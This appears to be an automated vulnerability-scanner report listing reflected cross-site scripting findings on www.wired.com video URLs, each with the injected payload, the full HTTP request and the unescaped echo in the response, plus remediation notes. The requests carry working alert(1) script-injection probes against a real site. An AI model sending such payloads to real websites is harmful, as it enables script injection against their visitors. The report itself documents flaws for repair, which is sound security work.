<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831a3"><a>e6926060861 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-doctor-who-the-hungry-earth831a3"><a>e6926060861/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:57:56 GMT Date: Mon, 22 Nov 2010 00:53:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-doctor-who-the-hungry-earth831a3"><a>e6926060861 c_664817239001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 283f1"-alert(1)-"762e65a9c8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001283f1"-alert(1)-"762e65a9c8a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:00:03 GMT Date: Mon, 22 Nov 2010 00:55:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b0a3"><a>29a45465649 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-doctor-who-the-hungry-earth/6648172390016b0a3"><a>29a45465649 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:12 GMT Date: Mon, 22 Nov 2010 00:54:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-doctor-who-the-hungry-earth c_6648172390016b0a3"><a>29a45465649"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a69b9--><script>alert(1)</script>9b884715abb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoa69b9--><script>alert(1)</script>9b884715abb/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29503 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:45 GMT Date: Mon, 22 Nov 2010 00:52:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoa69b9--><script>alert(1)</script>9b884715abb/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f0b7"><a>e66b21fed8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video2f0b7"><a>e66b21fed8c/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29470 Vary: Accept-Encoding Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:56:39 GMT Date: Mon, 22 Nov 2010 00:51:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video2f0b7"><a>e66b21fed8c ss_behind-the-scenes-of-harry-potter-and-the-deathly-hallows c_650875857001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2695a"-alert(1)-"4170dfbb3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows2695a"-alert(1)-"4170dfbb3c/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:47 GMT Date: Mon, 22 Nov 2010 00:53:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106812
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff018"><a>b757ef44c69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallowsff018"><a>b757ef44c69/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:48 GMT Date: Mon, 22 Nov 2010 00:52:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-of-harry-potter-and-the-deathly-hallowsff018"><a>b757ef44c69 c_650875857001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc05a"-alert(1)-"06ca3db5bf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001cc05a"-alert(1)-"06ca3db5bf4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:59:39 GMT Date: Mon, 22 Nov 2010 00:54:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e069"><a>59655ba9969 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/6508758570014e069"><a>59655ba9969 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:53 GMT Date: Mon, 22 Nov 2010 00:53:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-of-harry-potter-and-the-deathly-hallows c_6508758570014e069"><a>59655ba9969"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 733e5"><a>6aeef5d110a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video733e5"><a>6aeef5d110a/behind-the-scenes-with-jj-abrams/20039390001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29418 Vary: Accept-Encoding Cache-Control: max-age=271 Expires: Mon, 22 Nov 2010 00:55:29 GMT Date: Mon, 22 Nov 2010 00:50:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video733e5"><a>6aeef5d110a ss_behind-the-scenes-with-jj-abrams c_20039390001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5c545--><script>alert(1)</script>65965458990 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video5c545--><script>alert(1)</script>65965458990/behind-the-scenes-with-jj-abrams/20039390001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29452 Vary: Accept-Encoding Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:56:23 GMT Date: Mon, 22 Nov 2010 00:51:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video5c545--><script>alert(1)</script>65965458990/behind-the-scenes-with-jj-abrams/20039390001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb8f3"><a>39cc80102e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-with-jj-abramscb8f3"><a>39cc80102e6/20039390001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:56:25 GMT Date: Mon, 22 Nov 2010 00:51:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-with-jj-abramscb8f3"><a>39cc80102e6 c_20039390001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bead8"-alert(1)-"fa9b5494e92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-with-jj-abramsbead8"-alert(1)-"fa9b5494e92/20039390001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=281 Expires: Mon, 22 Nov 2010 00:57:36 GMT Date: Mon, 22 Nov 2010 00:52:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a135"><a>2745aaf740 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-with-jj-abrams/200393900019a135"><a>2745aaf740 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:57:55 GMT Date: Mon, 22 Nov 2010 00:52:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-with-jj-abrams c_200393900019a135"><a>2745aaf740"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53cca"-alert(1)-"49da715f4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-with-jj-abrams/2003939000153cca"-alert(1)-"49da715f4a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:02 GMT Date: Mon, 22 Nov 2010 00:54:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload d3d6f--><script>alert(1)</script>e2bf1c5c8cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videod3d6f--><script>alert(1)</script>e2bf1c5c8cd/calibrate-the-blues-away/4569448001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29435 Vary: Accept-Encoding Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:57:57 GMT Date: Mon, 22 Nov 2010 00:53:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videod3d6f--><script>alert(1)</script>e2bf1c5c8cd/calibrate-the-blues-away/4569448001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee46"><a>33fa741b98d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video4ee46"><a>33fa741b98d/calibrate-the-blues-away/4569448001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
